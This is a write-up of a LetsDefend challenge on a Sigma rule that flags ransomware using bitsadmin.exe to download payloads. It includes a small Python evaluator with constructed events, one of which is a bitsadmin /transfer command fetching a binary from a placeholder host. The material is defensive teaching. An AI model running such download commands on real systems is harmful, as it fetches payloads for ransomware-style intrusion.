LetsDefend-Sigma-Challenge

Detection engineering practice: Write-up and analysis of a LetsDefend challenge using a Sigma rule to detect ransomware activity leveraging bitsadmin.exe.

📌 Objective

Detect and analyze a ransomware infection that leveraged the Windows utility bitsadmin.exe to download additional malicious payloads, using a Sigma detection rule.

🧠 Skills Learned

  • Understanding Sigma rules and their structure (selection, condition, tags, fields, log sources)

  • Investigating ransomware behaviour with built-in Windows utilities

  • Correlating malicious activity with command-and-control (C2) communication patterns

  • Applying detection engineering concepts in a real-world SOC scenario


🛠 Tools Used

  • LetsDefend Platform (challenge environment)

  • Sigma Rules (YAML format)

  • Windows Event Logs (proc_creation events)

  • Text Editor (to review .yml rule file)


🔎 Steps Performed

  1. Reviewed the challenge description: ransomware suspected of using bitsadmin.exe.
     [Screenshot: the LetsDefend challenge page explaining what the challenge is about]

  2. Located the Sigma rule file:

     C:\Users\LetsDefend\Desktop\ChallengeFile\proc_creation_win_bitsadmin_download.yml

  3. Analyzed the Sigma rule sections:

     • Selection: defined suspicious process creation patterns involving bitsadmin.exe.

     • Condition: combined selections to flag malicious usage.

     • Tags & Fields: identified the rule's focus on ransomware and C2 communications.

     • Logsource: Windows process creation events.

  4. Mapped how this rule would detect attempts by ransomware to use bitsadmin.exe for downloads.

  5. Documented findings and uploaded screenshots for reference.

Explored the lab environment provided by LetsDefend.
[Screenshot: the LetsDefend lab environment for the Sigma challenge]

I used the Timeline Explorer for my findings.
[Screenshot: the Timeline Explorer window before any findings were made]

I discovered that the targeted executable file was the one targeted by the Sigma rule.
[Screenshot: the executable file]

The command line option used to indicate the file transfer in the Sigma rule.
[Screenshot: the command-line option used to indicate a file transfer]

The logical expression in the condition field combined the criteria to trigger the Sigma rule.
[Screenshot: the condition expression of the Sigma rule]

The specific field the Sigma rule captured shows the command being executed.
[Screenshot: the field that shows the command being executed]

The single ATT&CK tactic tag listed first in the Sigma rule.
[Screenshot: the first ATT&CK tactic tag listed in the Sigma rule]

The primary category of events that this Sigma rule was written to monitor.
[Screenshot: the primary event category the Sigma rule monitors]

The specific command line argument the Sigma rule looked for to identify the HTTP-based downloads.
[Screenshot: the command-line argument used to identify HTTP-based downloads]

The command line option that must be present to create a new transfer using bitsadmin.
[Screenshot: the command-line option used to indicate a file transfer]
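To show how the selection/condition structure described above actually evaluates against process creation events, here is an added example (not the challenge's rule file or any LetsDefend code): a minimal Sigma-style evaluator with a constructed rule whose selections are assumptions modelled on the write-up (image ending in bitsadmin.exe, command line containing a transfer switch and an http URL), run over constructed Sysmon-style events.

```python
"""Minimal evaluator for a Sigma-style selection over constructed process-creation events.
The RULE values are assumptions modelled on the write-up, not the challenge's own .yml file."""

# Constructed rule: two selections joined by the condition "selection_img and selection_cli".
RULE = {
    "detection": {
        "selection_img": {"Image|endswith": "\\bitsadmin.exe"},
        "selection_cli": {"CommandLine|contains|all": ["/transfer", "http"]},
        "condition": "selection_img and selection_cli",
    }
}

def field_matches(event: dict, key: str, expected) -> bool:
    """Apply Sigma field modifiers (endswith, contains, all) to one event field, case-insensitively."""
    field, *mods = key.split("|")
    value = str(event.get(field, "")).lower()
    wanted = expected if isinstance(expected, list) else [expected]
    wanted = [str(w).lower() for w in wanted]
    if "endswith" in mods:
        tests = [value.endswith(w) for w in wanted]
    elif "contains" in mods:
        tests = [w in value for w in wanted]
    else:
        tests = [value == w for w in wanted]
    # "all" requires every listed value to match; otherwise a list is OR-ed as in Sigma.
    return all(tests) if "all" in mods else any(tests)

def selection_matches(event: dict, selection: dict) -> bool:
    """Every field in a selection must match (fields within a selection are AND-ed)."""
    return all(field_matches(event, k, v) for k, v in selection.items())

def rule_matches(event: dict, rule: dict = RULE) -> bool:
    """Evaluate the condition. Only plain 'a and b' conditions are handled here (assumption)."""
    det = rule["detection"]
    names = [n.strip() for n in det["condition"].split(" and ")]
    return all(selection_matches(event, det[n]) for n in names)

# Constructed sample events (Sysmon-style process creation fields); the URL is a placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer job1 http://example.invalid/p.bin C:\Users\Public\p.bin"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "CommandLine": "bitsadmin.exe /list /allusers"},
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c echo http://example.invalid"},
]

def run_detection(events=SAMPLE_EVENTS):
    """Return the command lines of the events the rule flags."""
    return [e["CommandLine"] for e in events if rule_matches(e)]

if __name__ == "__main__":
    for hit in run_detection():
        print("ALERT:", hit)
```

Only the first event is flagged: the second runs bitsadmin.exe without creating a transfer, and the third contains a URL but is not bitsadmin.exe, which is why the rule ANDs the image and command-line selections.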
